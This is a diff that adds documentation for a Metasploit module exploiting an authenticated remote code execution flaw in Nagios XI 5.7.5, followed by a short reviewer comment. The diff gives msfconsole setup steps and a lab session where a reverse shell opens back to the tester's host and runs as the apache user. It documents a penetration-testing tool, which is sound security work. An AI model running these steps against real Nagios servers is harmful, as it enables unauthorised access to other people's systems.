documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md

```diff
@@ -0,0 +1,75 @@
+
+The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
+obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
+
+An OVA with the vulnerable NagiosXI application can be downloaded from Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
+
+
+## Verification Steps
+
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
+- [ ] `set RHOSTS TARGET_IP`
+- [ ] `set RPORT 443`
+- [ ] `set SSL true`
+- [ ] `set USERNAME USER`
+- [ ] `set PASSWORD PASSWORD`
+- [ ] `set TARGET_URL_PARAM plugin_output_len`
+- [ ] `set LHOST YOUR_IP`
+- [ ] `set LPORT YOUR_LISTENING_PORT`
+- [ ] `run`
+
+
+## Options
+
+### USERNAME
+A valid NagiosXI username, which can be for an administrator or regular user.
+
+### PASSWORD
+The password for the provided NagiosXI username.
+
+### TARGET_URL_PARAM
+The vulnerable URL parameter to inject payloads into. Defaults to plugin_output_len with ip_address as another option.
+
+## Scenarios
+Target is CentOS running NagiosXI 5.7.5 (Official OVA)
+```
+msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.7
+RHOSTS => 192.168.104.7
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
+RPORT => 443
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
+LHOST => 192.168.104.2
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 1234
+LPORT => 1234
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run
+
+[*] Started reverse SSL handler on 192.168.104.2:1234 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.5
+[+] The target appears to be vulnerable.
+[*] Executing the payload
+[*] Command shell session 1 opened (192.168.104.2:1234 -> 192.168.104.7:50884 ) at 2023-01-18 09:52:59 -0500
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+```
+
+## Version and OS
+Tested Nagios XI 5.7.5 on CentOS using their provided OVA
```

Comment:
```suggestion
```

This is why we have subheadings for scenarios: we should be including that information there. Atm this is just replication.